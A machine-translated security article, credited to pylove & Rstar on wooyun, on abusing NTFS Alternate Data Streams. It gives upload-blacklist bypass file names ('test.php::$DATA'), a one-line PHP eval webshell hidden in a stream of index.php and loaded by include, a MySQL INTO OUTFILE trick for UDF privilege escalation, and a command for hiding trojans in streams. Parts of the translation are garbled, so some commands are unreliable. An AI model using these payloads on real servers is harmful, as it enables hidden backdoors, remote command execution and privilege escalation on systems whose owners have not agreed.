ADS problems in NTFS

For a brief description of ADS, see the unfavorable aspects of NTFS.

It can be seen that ADS has been concerned by some security personnel for a long time ago, and some classic applications have also been put forward, such as hiding files and hiding webshells (exchange data streams (ADS) and the past and present of IIS), with this burst IIS Permission Bypass, we once again tested the method of using ADS in penetration, and found some interesting phenomena.

1. Classic IIS Directory Access Permission Bypass:

For details, see Microsoft IIS 6.0 and 7.5 Multiple Vulnerabilities.

Note: The permission here is the NTFS Directory attribute permission, not directly bypassing the background. Do not misunderstand.

2 Bypass blacklist Verification

During the test, we found that if the name of the uploaded file is test. php: $ DATA, a test is generated on the server. php file. The content is the same as that of the uploaded file and is parsed. Assume that the content of the file to be uploaded is: <? Php phpinfo ();?> The following figure shows the upload phenomenon:

File Content generated by the file name uploaded by the server surface symptom

Test. php: a.jpg generate Test. php empty

Test. php: $ DATA to generate test. php <? Php phpinfo ();?>

Test. php: $ INDEX_ALLOCATION to generate the test. php folder

Test. php: $ DATA \ 0.jpg to generate 0.jpg <? Php phpinfo ();?>

Test. php: $ DATA \ aaa.jpg generated aaa.jpg <? Php phpinfo ();?>

PS: upload test. php: a.jpg is actually a data stream file generated on the server. You can use notepad test. php: a.jpg to view the content, and test. php is normal if it is empty.

Based on the second phenomenon, we can bypass some blacklist verification.

When I added \ 0 to the end of the test, I wanted to cut off the following things, but I found that windows would ignore the two symbols, only the strings after the two symbols are recognized. (Because windows regards \/as a directory, while uploading only recognizes the file name)

3 exploitation in hiding webshell:

Method: echo a data stream file on the server. For example, index. php is a normal webpage file. We can do this: echo ^ <? Php @ eval (request [cmd])? ^> Index. php: hidden.jpg

In this way, an invisible shell hidden.jpg is generated. The regular file manager uses the typecommand, And the dircommand uses the delcommand to find the hidden.jpg file. We can include this ADS file in another normal file. <? Php include ('index. php: hidden.jpg ')?>, In this way, we can parse our sentence normally.

4. Exploitation of UDF Elevation of Privilege

UDF Privilege Escalation tips: if the database user has the insert and delete permissions on the database mysql (note that it refers to the default database mysql in the database), you can create and load a custom function. Because mysql runs on a windows host with the system permission, we can execute commands with the system permission through user-defined functions.

Mysql 5.1 or above (all versions are now 5.6, and it is estimated that the old version is not common .), When loading a user-defined function DLL, the directory must be the lib \ plugin \ directory under the mysql directory. Directly importing a directory such as C: \ windows \ system32 cannot load the dll, so it cannot perform the creat function. However, sadly, mysql 5.1 and later versions do not have the lib \ plugin directory by default during installation, unless you install the full version (the official version of more than 200 MB ).

In other cases, for example, if you have obtained webshell, but the webshell permission is restricted, you cannot create the lib \ plugin directory, or you have no webshell at all, only one weak Mysql password (without webshell UDF Elevation of Privilege + serv-u + character ). In the past, it was estimated that we only gave up, but we can use ADS to get rid of this restriction.

Demo:

Select 'xxx' into outfile 'd: \ mysql \ lib: $ INDEX_ALLOCATION ';

A lib directory is generated under the mysql directory.

5. Use ADS to hide Trojans

Hide and run the following command in cmd: type muma. ext test.txt: muma.exe

In this case, the trojan is written into the data stream of test.txt. However, if you want to run it, you still need to use other tools. winrar is one of them. The specific methods are available in Baidu encyclopedia. However, if you do not trust it in the encyclopedia, it will fail, you must use the type command to write binary executable files.

. So I have not studied this exploitation.

NOTE: If an executable file is in the data stream, it must fail in Windows xp and Windows 2003 when calling the start command.

-- By: pylove & Rstar http://zone.wooyun.org/content/1064